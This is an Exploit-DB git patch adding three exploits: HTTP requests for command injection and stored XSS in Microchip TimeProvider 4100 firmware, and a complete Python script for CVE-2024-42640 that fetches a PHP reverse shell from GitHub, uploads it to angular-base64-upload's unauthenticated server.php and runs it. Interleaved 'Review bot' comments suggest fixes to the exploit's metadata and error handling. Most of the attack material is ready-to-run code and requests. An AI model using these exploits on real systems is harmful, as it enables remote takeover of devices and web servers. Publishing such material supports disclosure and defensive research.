From f8c80e2b5d5701709f9991339f1aabc9e591c6f2 Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Sat, 5 Apr 2025 00:16:29 +0000
Subject: [PATCH] DB: 2025-04-05

4 changes to exploits/shellcodes/ghdb

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)

---
 exploits/hardware/remote/52119.NA | 175 ++++++++++++++++++++++++++++++
 exploits/hardware/remote/52120.NA | 175 ++++++++++++++++++++++++++++++
 exploits/multiple/remote/52121.py | 139 ++++++++++++++++++++++++
 files_exploits.csv | 3 +
 4 files changed, 492 insertions(+)
 create mode 100644 exploits/hardware/remote/52119.NA
 create mode 100644 exploits/hardware/remote/52120.NA
 create mode 100755 exploits/multiple/remote/52121.py

diff --git a/exploits/hardware/remote/52119.NA b/exploits/hardware/remote/52119.NA
new file mode 100644
index 000000000..feec97aa4
--- /dev/null
+++ b/exploits/hardware/remote/52119.NA
@@ -0,0 +1,175 @@
+# Exploit Title: Microchip TimeProvider 4100 Grandmaster Config File - Remote Code Execution (RCE)
+
+# Exploit Author: Armando Huesca Prida
+
+# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
+
+# Date of Disclosure: 27/06/2024
+
+# Date of CVE Publication: 4/10/2024
+
+# Exploit Publication: 10/10/2024
+
+# Vendor Homepage: https://www.microchip.com/
+
+# Version: Firmware release 1.0 through 2.4.7
+
+# Tested on: Firmware release 2.3.12
+
+# CVE: CVE-2024-9054
+
+# External References:
+
+# URL: https://www.cve.org/cverecord?id=CVE-2024-9054
+
+# URL: https://0xhuesca.com/2024/10/cve-2024-9054.html
+
+# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file
+
+# URL: https://www.gruppotim.it/it/footer/red-team.html
+
+
+
+
+
+# Vulnerability Description:
+
+
+
+A Remote Code Execution (RCE) vulnerability exists in the "secret_key" XML tag in the Microchip TimeProvider 4100 device's configuration file. Once the configuration file containing the malicious payload is loaded by the device, after first attempt of login the payload will execute resulting in remote code execution.
+
+
+
+
+
+# Exploitation Steps:
+
+
+
+1- Perform login into the device's management web interface.
+
+2- Download the device's configuration file.
+
+3- Substitute the "secret_key" value with the malicious payload.
+
+4- Save the new configuration file containing the OS command to be executed.
+
+5- Restore and submit the new configuration.
+
+6- Attempt of login using any active service like SSH/Telnet/Console will trigger the malicious payload.
+
+
+
+
+
+# Example of malicious XML config file:
+
+
+
+
+
+[...]
+
+
+
+ [...]
+
+
+
+ 192.168.1.1
+
+ `ping 192.168.1.20`
+
+ [...]
+
+
+
+ [...]
+
+
+
+[...]
+
+
+
+# Proof of Concept - PoC:
+
+
+
+Manually modifying the following request it's possible to obtain interactive shell on the vulnerable device. Below is provided the list of values to be updated on the Exploit - HTTP request:
+
+- [session cookie]
+
+- [XML configuration file containing the injection on "secret_key" tag]
+
+- [Web account password in clear-text]
+
+- [device IP]
+
+
+
+
+
+# Exploit - Restore and submit config file HTTP Request:
+
+
+
+POST /config_restore HTTP/1.1
+
+Host: [device IP]
+
+Cookie: ci_session=[session cookie]
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate, br
+
+Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002
+
+Content-Length: 206640
+
+Origin: https://[device IP]
+
+Referer: https://[device IP]/configbackuprestore
+
+Sec-Fetch-Dest: empty
+
+Sec-Fetch-Mode: cors
+
+Sec-Fetch-Site: same-origin
+
+Te: trailers
+
+Connection: keep-alive
+
+
+
+-----------------------------182708909322642582691204887002
+
+Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"
+
+Content-Type: text/plain
+
+
+
+[XML configuration file containing the injection on "secret_key" tag]
+
+-----------------------------182708909322642582691204887002
+
+Content-Disposition: form-data; name="pword"
+
+
+
+[Web account password in clear-text]
+
+-----------------------------182708909322642582691204887002--
+
+
+
+
+
+# End
\ No newline at end of file
diff --git a/exploits/hardware/remote/52120.NA b/exploits/hardware/remote/52120.NA
new file mode 100644
index 000000000..04d6f8e24
--- /dev/null
+++ b/exploits/hardware/remote/52120.NA
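Review bot: The advisory header and the index entry disagree on affected versions and on the title: this file says `# Version: Firmware release 1.0 through 2.4.7` and names the issue "Config File - Remote Code Execution (RCE)", while the files_exploits.csv row for 52119 lists "(Configuration modules) 2.4.6 - OS Command Injection"; the same mismatch applies to 52120.NA, whose header also says 2.4.7 against 2.4.6 in the index. One of the two should be corrected so that anyone triaging a deployment by firmware version gets a consistent answer. The date fields also mix formats (`27/06/2024` beside `4/10/2024` and `10/10/2024`), which leaves the October dates ambiguous; if they are DD/MM like the disclosure date, writing them as `2024-10-04` and `2024-10-10` removes the doubt. A `# Fixed in:` line would help defenders confirm remediation, if the linked Microchip advisory names a fixed firmware release.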
@@ -0,0 +1,175 @@
+# Exploit Title: Microchip TimeProvider 4100 Grandmaster (banner) - Stored XSS
+
+# Exploit Author: Armando Huesca Prida
+
+# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
+
+# Date of Disclosure: 27/06/2024
+
+# Date of CVE Publication: 4/10/2024
+
+# Exploit Publication: 10/10/2024
+
+# Vendor Homepage: https://www.microchip.com/
+
+# Version: Firmware release 1.0 through 2.4.7
+
+# Tested on: Firmware release 2.3.12
+
+# CVE: CVE-2024-43687
+
+# External References:
+
+# URL: https://www.cve.org/cverecord?id=CVE-2024-43687
+
+# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html
+
+# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
+
+# URL: https://www.gruppotim.it/it/footer/red-team.html
+
+
+
+
+
+# Vulnerability Description:
+
+
+
+The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context.
+
+
+
+
+
+# Exploitation Steps:
+
+
+
+1- Log in to the device's web management interface.
+
+2- Open the banner configuration panel.
+
+3- Select the "custom banner" feature.
+
+4- Insert the malicious JavaScript payload.
+
+5- Apply and save the system configuration containing the custom banner.
+
+6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.
+
+
+
+
+
+# Example of malicious JavaScript payload:
+
+
+
+
+
+
+
+
+
+# Proof of Concept - PoC:
+
+
+
+By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values that must be updated in the exploit HTTP request is given below:
+
+- [session cookie]
+
+- [malicious JavaScript payload]
+
+- [device IP]
+
+
+
+
+
+# Exploit - HTTP Request:
+
+
+
+POST /bannerconfig HTTP/1.1
+
+Host: [device IP]
+
+Cookie: ci_session=[session cookie]
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate, br
+
+Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
+
+Content-Length: 673
+
+Origin: https://[device IP]
+
+Referer: https://[device IP]/bannerconfig
+
+Upgrade-Insecure-Requests: 1
+
+Sec-Fetch-Dest: document
+
+Sec-Fetch-Mode: navigate
+
+Sec-Fetch-Site: same-origin
+
+Sec-Fetch-User: ?1
+
+Te: trailers
+
+Connection: keep-alive
+
+
+
+-----------------------------9680247575877256312575038502
+
+Content-Disposition: form-data; name="user_level"
+
+
+
+1
+
+-----------------------------9680247575877256312575038502
+
+Content-Disposition: form-data; name="bannerradio"
+
+
+
+CUSTOMIZED
+
+-----------------------------9680247575877256312575038502
+
+Content-Disposition: form-data; name="txtcustom"
+
+
+
+[malicious JavaScript payload]
+
+
+
+-----------------------------9680247575877256312575038502
+
+Content-Disposition: form-data; name="action"
+
+
+
+applybanner
+
+-----------------------------9680247575877256312575038502--
+
+
+
+
+
+
+
+# End
\ No newline at end of file
diff --git a/exploits/multiple/remote/52121.py b/exploits/multiple/remote/52121.py
new file mode 100755
index 000000000..8a8caaa90
--- /dev/null
+++ b/exploits/multiple/remote/52121.py
@@ -0,0 +1,139 @@
+#!/bin/python3
+
+# Exploit Title: Unauthenticated RCE via Angular-Base64-Upload Library
+# Date: 10 October 2024
+# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)
+# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
+# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload
+# Software Link: https://github.com/adonespitogo/angular-base64-upload
+# Version: prior to v0.1.21
+# Tested on: Arch Linux
+# CVE : CVE-2024-42640
+# Severity: Critical - 10.0 (CVSS 4.0)
+# Github Link : https://github.com/rvizx/CVE-2024-42640
+# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
+
+# DISCLAIMER:
+
+# This proof-of-concept (POC) exploit is provided strictly for educational and research purposes.
+# It is designed to demonstrate potential vulnerabilities and assist in testing the security posture of software systems.
+# The author expressly disclaims any responsibility for the misuse of this code for malicious purposes or illegal activities.
+# Any actions taken with this code are undertaken at the sole discretion and risk of the user.
+# The author does not condone, encourage, or support any unauthorized access, intrusion, or disruption of computer systems.
+# Use of this POC exploit in any unauthorized or unethical manner is strictly prohibited.
+# By using this code, you agree to assume all responsibility and liability for your actions.
+# Furthermore, the author shall not be held liable for any damages or legal repercussions resulting from the use or misuse of this code.
+# It is your responsibility to ensure compliance with all applicable laws and regulations governing your use of this software.
+# Proceed with caution and use this code responsibly.
+ + +import re +import subprocess +import requests +import sys +import os +import uuid +import base64 + + +def banner(): + print(''' + + \033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit + \033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9 + https://github.com/rvizx/\033[0mCVE-2024-42640 + +''') + + +def enum(url): + print("\033[94m[inf]:\033[0m enumerating for dependency installtion directories... ") + target = f"{url}/bower_components/angular-base64-upload/demo/index.html" + r = requests.head(target) + if r.status_code == 200: + print("\033[94m[inf]:\033[0m target is using bower_components") + else: + print("\033[94m[inf]:\033[0m target is not using bower_components") + target = f"{url}/node_modules/angular-base64-upload/demo/index.html" + r = requests.head(target) + if r.status_code == 200: + print("\033[94m[inf]:\033[0m target is using node_modules") + else: + print("\033[94m[inf]:\033[0m target is not using node_modules") + print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for angular-base64-upload/demo/index.html") + print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory") + print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html") + print("\033[91m[err]:\033[0m exiting..") + exit() + + version = next((line for line in requests.get(target.replace("demo/index.html","CHANGELOG.md")).text.splitlines() if 'v0' in line), None) + print("\033[94m[inf]:\033[0m angular-base64-upload version: ",version) + exploit(target) + + + + + +def exploit(target): + print(f"[dbg]: {target}") + target_server_url = target.replace("index.html","server.php") + print(f"[dbg]: {target_server_url}") + payload_url = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php" + 
print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..") + ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ") + port = input("\033[93m[ins]:\033[0m enter listenter port: ") + print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}") + input("\033[93m[ins]:\033[0m press enter to continue...") + print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...") + response = requests.get(payload_url) + if response.status_code == 200: + php_code = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input + payload_name = str(uuid.uuid4())+".php" # using a uuid for payload name + with open(payload_name, "w") as file: + file.write(php_code) + else: + print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.") + print("\033[91m[err]:\033[0m exiting..") + exit() + + with open(payload_name, 'rb') as file: + file_content = file.read() + base64_payload = base64.b64encode(file_content).decode('utf-8') + + headers = { + 'Content-Type': 'application/json', + } + + json_data = { + 'base64': base64_payload, + 'filename': payload_name, + } + + response = requests.post(target_server_url, headers=headers, json=json_data, verify=False) + print("\033[94m[inf]:\033[0m file upload request sent! 
[status-code]: ",response.status_code) + updemo_endpoint = f"uploads/{payload_name}" + print(f"[dbg]: {updemo_endpoint}") + payload_url = target_server_url.replace("server.php",updemo_endpoint) + print(f"[dbg]: {payload_url}") + if response.status_code == 200: + print(f"\033[94m[inf]:\033[0m reverse-shell is uploaded to {payload_url}") + print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..") + r = requests.get(payload_url) + + if r.status_code == 200: + print("\033[94m[inf]:\033[0m process complete!") + else: + print("\033[91m[err]:\033[0m something went wrong!") + + print("\033[93m[ins]:\033[0m please check the listener for incoming connections.") + + +if __name__ == "__main__": + try: + banner() + url = sys.argv[1] + print(f"\033[94m[inf]:\033[0m target: {url}") + enum(url) + except: + print("[usg]: ./exploit.py ") + exit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ac906de02..24a4b9573 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
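Review bot: The bare `except:` at the end of the `__main__` block also catches the `SystemExit` raised by the `exit()` calls inside `enum()` and any `requests` exception propagating out of `enum()`/`exploit()`, so every failure path ends with the usage line `[usg]: ./exploit.py` instead of the real error; narrowing it to `except IndexError:`, which is all a missing `sys.argv[1]` can raise, keeps genuine errors visible. The `#!/bin/python3` shebang assumes an interpreter at a non-standard path, and `requests` is a third-party dependency that the header does not mention; `#!/usr/bin/env python3` plus a `# Requires: requests` line in the header would cover both. The imports `re`, `subprocess` and `os` are never used in the file and can be dropped.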
@@ -3760,6 +3760,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51850,exploits/hardware/remote/51850.txt,"Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)",2024-03-03,"Alok kumar",remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
 40120,exploits/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,remote,hardware,,2016-07-18,2016-12-09,0,CVE-2016-3989;CVE-2016-3962,,,,,https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
 40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,,2016-10-20,2016-10-27,0,CVE-2013-4863;CVE-2016-6255,,,,,
+52119,exploits/hardware/remote/52119.NA,"Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection",2025-04-04,"Armando Huesca Prida",remote,hardware,,2025-04-04,2025-04-04,0,CVE-2024-9054,,,,,
+52120,exploits/hardware/remote/52120.NA,"Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)",2025-04-04,"Armando Huesca Prida",remote,hardware,,2025-04-04,2025-04-04,0,CVE-2024-43687,,,,,
 45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,,2018-07-17,2018-07-17,0,,,,,,
 45578,exploits/hardware/remote/45578.cpp,"MicroTik RouterOS < 6.43rc3 - Remote Root",2018-10-10,"Jacob Baines",remote,hardware,,2018-10-10,2018-10-10,0,CVE-2018-14847,Remote,,,,
 41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,,2017-03-24,2017-03-24,0,CVE-2017-7240,,,,,
@@ -10632,6 +10634,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21116,exploits/multiple/remote/21116.pl,"Amtote Homebet - Account Information Brute Force",2001-09-28,"Gary O'Leary-Steele",remote,multiple,,2001-09-28,2012-09-06,1,CVE-2001-1528;OSVDB-20236,,,,,https://www.securityfocus.com/bid/3371/info
 21115,exploits/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",remote,multiple,,2001-09-28,2012-09-06,1,CVE-2001-1170;OSVDB-9788,,,,,https://www.securityfocus.com/bid/3370/info
 22130,exploits/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,remote,multiple,,2003-01-06,2012-10-21,1,CVE-2003-1271;OSVDB-59639,,,,,https://www.securityfocus.com/bid/6529/info
+52121,exploits/multiple/remote/52121.py,"Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)",2025-04-04,"Ravindu Wickramasinghe",remote,multiple,,2025-04-04,2025-04-04,0,CVE-2024-42640,,,,,
 33497,exploits/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,remote,multiple,,2010-01-11,2014-05-26,1,CVE-2009-4494;OSVDB-61772,,,,,https://www.securityfocus.com/bid/37712/info
 18442,exploits/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,remote,multiple,,2012-01-31,2012-01-31,1,CVE-2012-0053;OSVDB-78556,,,,,https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
 21067,exploits/multiple/remote/21067.c,"Apache 1.0/1.2/1.3 - Server Address Disclosure",2001-08-21,magnum,remote,multiple,,2001-08-21,2012-09-04,1,OSVDB-86902,,,,,https://www.securityfocus.com/bid/3169/info